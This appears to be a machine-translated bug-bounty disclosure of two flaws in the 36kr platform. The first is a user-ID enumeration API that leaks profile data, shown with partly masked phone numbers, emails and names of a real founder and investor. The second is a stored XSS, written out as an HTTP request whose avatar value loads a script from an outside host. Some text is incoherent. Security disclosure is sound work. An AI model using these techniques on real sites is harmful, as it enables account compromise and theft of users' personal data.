36kr user information leakage: contact information of all investors/founders + stored XSS

36kr user information leakage: contact information of all investors/founders + stored XSS

When I met an investor in the morning, he said, "Let me remember your team in 10 seconds." I gave him a slap when I thought about it. While he was still stunned, I ran quickly, I just received a text message asking me to go into details at tomorrow. Should I go?

Test environment:

Note2 + 36kr Android 2.1.0

1. unauthorized access to the app interface to obtain user information

Register and log on to rong.36kr.com. I will verify it by text message.

Access interface url:

http://rong.36kr.com/api/v1/ios-user/-ID-/profile

The ID can be traversed. For example, you can view the contact information of the founder of the Note app:
 

View the contact information of the Founder:

Http://rong.36kr.com/api/v1/ios-user/711/profile (You need to log on to your account first)
 

User ": {" avatar ":" http://krplus-pic.b0.upaiyun.com/201503/23195614/7be9e2cc259d7834.jpg "," email ":" laputan mosaic @ fotoplace. cc "," Iser ": 1," id ": 711," investorType ": 100," isDisplayWeixin ": false," name ":" Willow "," nickAvatar ": "http://wx.qlogo.cn/mmopen/ajNVdqHZLLAl21jrHaCHQzgF1DrAsBDIJ1RJ3Hvvr8PCfmCQIkfbBHKoItkKTgDBV4SDZSFgiaoZUs4sdR7udXQ/0", "nickName": "Willow (fotoplace)", "phone": "13918331 Mosaic" }}, "msg": "operation successful! "}

View contact information of investors:

Http://rong.36kr.com/api/v1/ios-user/28633/profile

User ": {" avatar ":" http://krplus-pic.b0.upaiyun.com/c00dd2691e0937663493df104fb18976 "," email ":" mosaic [email protected] "," enterpriser ": 0," id ": 28633," intro ": "Hirst Capital China Investment Director", "investorType": 20, "isDisplayWeixin": false, "linkedin": "", "name": "Hu Ying Qing ", "nickName": "1350199 Mosaic", "phone": "1350199 Mosaic", "weibo ":""}

Bytes ---------------------------------------------------------------------------------------

2. Stored xss


The app uploads an avatar and directly calls the image address.

This is the request package for updating the Avatar.
 

PUT/api/v1/user/my id/basic HTTP/1.1 Cookie: my Cookie information; Content-Length: 54Content-Type: application/x-www-form-urlencodedHost: rong.36kr. comConnection: Keep-AliveUser-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) avatar = http://krplus-pic.b0.upaiyun.com/xxxxxx.jpg "> <script src = http://t.cn/xxx> </script>

The avatar parameter can be customized. xss code can be inserted because no filtering is performed. The effect is as follows:


 

The key token information in cookies should be protected by httponly.

 

Solution:

In xss, I only tested the profile picture of the APP. Check the user name and personal information.